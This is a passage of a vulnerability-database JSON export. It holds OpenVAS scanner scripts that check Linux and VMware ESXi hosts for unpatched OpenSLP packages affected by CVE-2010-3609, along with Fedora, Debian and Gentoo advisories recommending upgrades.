NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:1361412562310831727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831727", "type": "openvas", "title": "Mandriva Update for openslp MDVSA-2012:141 (openslp)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openslp MDVSA-2012:141 (openslp)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:141\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831727\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:57:24 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:141\");\n script_name(\"Mandriva Update for openslp MDVSA-2012:141 (openslp)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openslp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2)\");\n script_tag(name:\"affected\", value:\"openslp on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in openslp:\n\n The extension parser in slp_v2message.c in OpenSLP 1.2.1 allows\n remote attackers to cause a denial of service (infinite loop) via a\n packet with a next extension offset that references this extension\n or a previous extension (CVE-2010-3609).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-12-04T11:26:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1118-1", "modified": "2017-12-01T00:00:00", "published": "2011-05-10T00:00:00", "id": "OPENVAS:840637", "href": "http://plugins.openvas.org/nasl.php?oid=840637", "type": "openvas", "title": "Ubuntu Update for openslp-dfsg USN-1118-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1118_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for openslp-dfsg USN-1118-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that OpenSLP incorrectly handled certain corrupted\n messages. A remote attacker could send a specially crafted packet to\n the OpenSLP server and cause it to hang, leading to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1118-1\";\ntag_affected = \"openslp-dfsg on Ubuntu 10.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 8.04 LTS ,\n Ubuntu 6.06 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1118-1/\");\n script_id(840637);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"1118-1\");\n script_cve_id(\"CVE-2010-3609\");\n script_name(\"Ubuntu Update for openslp-dfsg USN-1118-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.6ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.5ubuntu0.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-5ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.7ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310869371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869371", "type": "openvas", "title": "Fedora Update for openslp FEDORA-2015-7561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openslp FEDORA-2015-7561\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869371\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 10:43:33 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2010-3609\", \"CVE-2012-4428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openslp FEDORA-2015-7561\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openslp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openslp on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-7561\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159059.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~22.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-19T16:08:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.", "modified": "2019-12-18T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:1361412562310103453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103453", "type": "openvas", "title": "VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm (VMSA-2011-0004.3)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103453\");\n script_cve_id(\"CVE-2010-3613\", \"CVE-2010-3614\", \"CVE-2010-3762\", \"CVE-2010-3316\", \"CVE-2010-3435\", \"CVE-2010-3853\", \"CVE-2010-2059\", \"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm (VMSA-2011-0004.3)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:14 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2011-0004.html\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\");\n\n script_tag(name:\"affected\", value:\"VMware ESXi 4.1 without patch ESXi410-201101201-SG\n\n VMware ESXi 4.0 without patch ESXi400-201103401-SG\n\n VMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG\n\n VMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG\");\n\n script_tag(name:\"impact\", value:\"a. Service Location Protocol daemon DoS\n\n Exploitation of this vulnerability could cause SLPD to consume significant CPU resources.\");\n\n script_tag(name:\"insight\", value:\"Service Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\n for bind, pam, and rpm.\n\n a. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD).\n\n b. Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\n c. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\n d. Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"4.1.0\", \"ESXi410-201101201-SG\",\n \"4.0.0\", \"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-30T10:48:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\n\nSummary\n\nService Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\nfor bind, pam, and rpm.\n\nRelevant releases\n\nVMware ESXi 4.1 without patch ESXi410-201101201-SG.\nVMware ESXi 4.0 without patch ESXi400-201103401-SG.\nVMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG.\nVMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG.\n\nProblem Description\n\na. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of\n this vulnerability could cause SLPD to consume significant CPU resources.\n\nb. Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\nc. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\nd. Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.", "modified": "2017-10-26T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:103453", "href": "http://plugins.openvas.org/nasl.php?oid=103453", "type": "openvas", "title": "VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2011-0004.nasl 7583 2017-10-26 12:07:01Z cfischer $\n#\n# VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\n\nSummary\n\nService Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\nfor bind, pam, and rpm.\n\nRelevant releases\n\nVMware ESXi 4.1 without patch ESXi410-201101201-SG.\nVMware ESXi 4.0 without patch ESXi400-201103401-SG.\nVMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG.\nVMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG.\n\nProblem Description\n\na. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of\n this vulnerability could cause SLPD to consume significant CPU resources.\n\nb. Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\nc. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\nd. Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.\";\n\ntag_solution = \"Apply the missing patch(es).\";\n\nif (description)\n{\n script_id(103453);\n script_cve_id(\"CVE-2010-3613\", \"CVE-2010-3614\", \"CVE-2010-3762\", \"CVE-2010-3316\", \"CVE-2010-3435\", \"CVE-2010-3853\", \"CVE-2010-2059\", \"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 7583 $\");\n script_name(\"VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\");\n\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 14:07:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:14 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.vmware.com/security/advisories/VMSA-2011-0004.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\"); # Used in _esxi_patch_missing()\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(! esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"4.1.0\",\"ESXi410-201101201-SG\",\n \"4.0.0\",\"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n\n\n\n\n\n\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "description": "Service Location Protocol is an IETF standards track protocol that provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks. OpenSLP is an open source implementation of the SLPv2 protocol as defined by RFC 2608 and RFC 2614. ", "modified": "2015-05-27T16:29:19", "published": "2015-05-27T16:29:19", "id": "FEDORA:66039603513B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: openslp-1.2.1-22.fc20", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:25:24", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2012-4428", "CVE-2015-5177"], "description": "Package : openslp-dfsg\nVersion : 1.2.1-7.8+deb6u1\nCVE ID : CVE-2010-3609 CVE-2012-4428 CVE-2015-5177\nDebian Bug : 623551 687597 795429\n\nSeveral issues have been found and solved in OpenSLP, that implements the\nInternet Engineering Task Force (IETF) Service Location Protocol standards\nprotocol.\n\nCVE-2010-3609\n\n Remote attackers could cause a Denial of Service in the Service Location\n Protocol daemon (SLPD) via a crafted packet with a "next extension offset".\n\nCVE-2012-4428\n\n Georgi Geshev discovered that an out-of-bounds read error in the\n SLPIntersectStringList() function could be used to cause a DoS.\n\nCVE-2015-5177\n\n A double free in the SLPDProcessMessage() function could be used to cause\n openslp to crash.\n\nFor Debian 6 "Squeeze", these problems have been fixed in openslp-dfsg\nversion 1.2.1-7.8+deb6u1.\n\nWe recommend that you upgrade your openslp-dfsg packages.\n\nLearn more about the Debian Long Term Support (LTS) Project and how to\napply these updates at: https://wiki.debian.org/LTS/\n", "edition": 7, "modified": "2015-09-03T07:43:26", "published": "2015-09-03T07:43:26", "id": "DEBIAN:DLA-304-1:F9879", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201509/msg00000.html", "title": "[SECURITY] [DLA 304-1] openslp-dfsg security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2017-07-08T16:15:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4912", "CVE-2010-3609", "CVE-2016-7567", "CVE-2012-4428"], "description": "### Background\n\nOpenSLP is an open-source implementation of Service Location Protocol (SLP). \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSLP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly cause a Denial of Service condition or have other unspecified impacts. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSLP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/openslp-2.0.0-r4\"", "edition": 1, "modified": "2017-07-08T00:00:00", "published": "2017-07-08T00:00:00", "href": "https://security.gentoo.org/glsa/201707-05", "id": "GLSA-201707-05", "title": "OpenSLP: 